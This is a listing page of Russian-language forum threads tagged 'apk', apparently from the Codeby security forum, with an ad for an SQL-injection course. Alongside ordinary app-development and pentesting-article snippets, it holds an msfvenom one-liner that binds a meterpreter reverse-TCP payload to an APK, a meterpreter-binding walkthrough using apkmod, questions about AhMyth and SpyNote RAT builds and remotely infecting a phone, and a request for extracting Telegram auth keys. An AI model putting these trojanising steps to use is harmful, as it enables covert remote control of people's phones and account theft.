• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

apk

  1. R

    Достать Telegram auth_key из Android

    Телеграм использует 2 параметра для авторизационной сессии: dc: X and dcX_auth_key: "Y" Веб клиент хранит эти параметры в LocalStorage браузера. Python Telethon при работе с аккаунтом по MTProto хранит auth_key и выдает их по запросу client.session.auth_key А где Телеграм хранит эти параметры...
  2. S

    Статья Биндим к .apk файлу метерпретер при помощи apkmod

    Всем привет! в данной статье я расскажу как забиндить к .apk файлу метерпретер при помощи apkmod Нам понадобится: .apk к которому клеем, metasploit и apkmod. Установка apkmod: Сначало нужно скачать установщик. wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh Затем пишем...
  3. N1GGA

    Сканер вирусов APK файлов

    Шалом всем. Кто знает, есть ли бесплатные сервисы для скана файлов APK на вирусы, которые не сливают сигнатуру? Если нет бесплатные, то хотя бы платные, кидайте ссылки. Спасибо заранее.
  4. LakeR073

    Проблема с Ahmyth

    Появилась проблема с подключением на телефон жервы(мой),открываю порт, делаю зараженный apk, закидываю в тел, запускаю, перезагружаю но все равно ничего не получается, просто не появляется окно с подключением в тел, протестировал на эмуляторе- все работает (только без указания порта), такое...
  5. Keil

    Заразить удалённо Android-телефон.

    Доброго времени суток! Возник такой вот вопрос. Как можно заразить малварём телефон на Android? Само устройство- Redmi Note 8 Pro, если это имеет значение. Пытался делать билды в AhMyth, SpyNote 6.4, всё без толку. При попытке установить APK выдаёт ошибку "файл недоступен". В SpyNote билд...
  6. А

    Нужна помощь со сборкой apk

    Доброго времени суток Пишу на python, появилась необходимость собрать apk-файл, решила действовать по этой инструкции: https://python-for-android.readthedocs.io/en/latest/quickstart/#usage Не очень понятен блок "Инструменты платформы и сборки", а конкретно, как установить целевую платформу API...
  7. Q

    Какие есть способы запуска apk из под linux?

    Пробовал на арче, anbox он давно не обновлялся и вылетает, shashlik запускает ток 32 битные apk, chromium archon тоже глючит и не запускает некоторые приложения, какие еще есть варианты без эмуляции на виртуалке
  8. cr1pt0n

    msfvenom и apk

    Здравствуйте ребята. Создал пэйлоад для андроида с помощью msfvenom(склеил пейлоад к другому apk). msfvenom -x original.apk -p android/meterpeter/reverset_tcp LHOST=ip LPORT=ip -o apk Но при установке приложение никаких разрешений не спрашивает. То есть у него вообще нету привилегий. Разобрал...
  9. Zer0must2b

    Гостевая статья Уязвимости Android WebView

    WebViews используются в приложениях для Android для загрузки содержимого и HTML-страниц в приложении. Благодаря этой функциональности реализация WebView должна быть безопасной, чтобы не вводить приложение с большим риском. Цель этой статьи - изучить вещи, которые сделают WebView менее...
  10. Zer0must2b

    Гостевая статья Reverse Engineering Android-приложений

    Тесты на проникновение в мобильные приложения выходят за рамки стандартного обнаружения уязвимостей через Burp Suite. Крайне важно знать, как декомпилировать приложение для проверки уязвимостей в коде приложения. Целью этой статьи является демонстрация различных методов и инструментов для...
  11. Zer0must2b

    Гостевая статья Получение APK-файлов

    Первым шагом в каждой оценке безопасности Android является наличие файла .APK, который является фактическим приложением. В большинстве случаев клиент несет ответственность за предоставление этого файла, особенно в ситуации, когда фактическое приложение не является общедоступным. Однако если по...
  12. Zer0must2b

    Гостевая статья Правила безопасности для файлов манифеста Android

    Файлы манифеста играют важную роль для каждого приложения для Android. В этом файле разработчик Android определяет разрешения, которые требуются приложению, действия, которые может выполнять приложение, и общие другие действия. С точки зрения безопасности, файл манифеста, как правило, является...
  13. Zer0must2b

    Гостевая статья Внедрение полезных нагрузок Metasploit в приложения для Android

    Можно использовать легитимное приложение Android в качестве трояна, чтобы использовать фактическое устройство пользователя. Причины того, почему этот тест важен при каждой оценке безопасности Android, заключается в том, что он позволит тестеру определить, существуют ли определенные защиты вокруг...
  14. Zer0must2b

    Гостевая статья Внедрение полезных нагрузок Metasploit в приложения для Android - вручную

    Большинству приложений Android не хватает достаточной защиты вокруг двоичного файла, и поэтому злоумышленник может легко троянизировать легитимное приложение с вредоносными нагрузками. Это одна из причин того, что мобильное вредоносное ПО так быстро распространяется в телефонах Android. При...
  15. IWI

    Разработка приложений.

    Здравствуйте, ищу разработчика приложений apk, может есть на форуме такие ребята. Хотелось бы сделать vpn на мобильные устройства и много ещё различных приложений. Может у вас есть знакомые которые занимаются разработкой мобильных приложений. Напишите мне в лс или посоветуйте кого нибудь...
  16. antvel

    adb Как При установке приложений на xiaomi каждый раз не спрашивать подтверждение

    Добрый день! Сейчас есть небольшой bash скрипт adb который автоматически устанавливает пулл приложений, 5 apk на смартфоны, с самсунгами все отлично, но xiaomi для каждого приложения спрашивает "установить приложение по usb или нет?" (больше того, еще стоит таймер, если за 30 секунд не...
  17. antvel

    Авто установка приложений в android

    Добрый день! Есть задача, реализовать авто установку apk (около 10 - ти штук) на android от 5 версии по интернету без root прав. Перелопатил много статей, понимаю что это на уровне невозможного (или по крайней мере мне так кажется из за не знания). Возможно вы сможете что то подсказать? Пока...
  18. Zer0must2b

    apk fatrat - как подписан установленный пейлоад apk в android системе?

    а как подписан установленый пейлоад apk в android системе,имею ввиду com.android и тд. может кто знает?
  19. K

    Как поставить цифровую подпись на apk

    Как поставить подпись на apk?
  20. W

    Ищу реверсера Java (JVM)

    Нужно разобрать apk файл Задача: понять протокол общения с сервером (сокеты или веб сокеты скорее всего), определить шифрование и фрагментацию, структуру пакетов, в декомпилированном коде следует найти механизмы детектирования ботов Связь - телега @webstep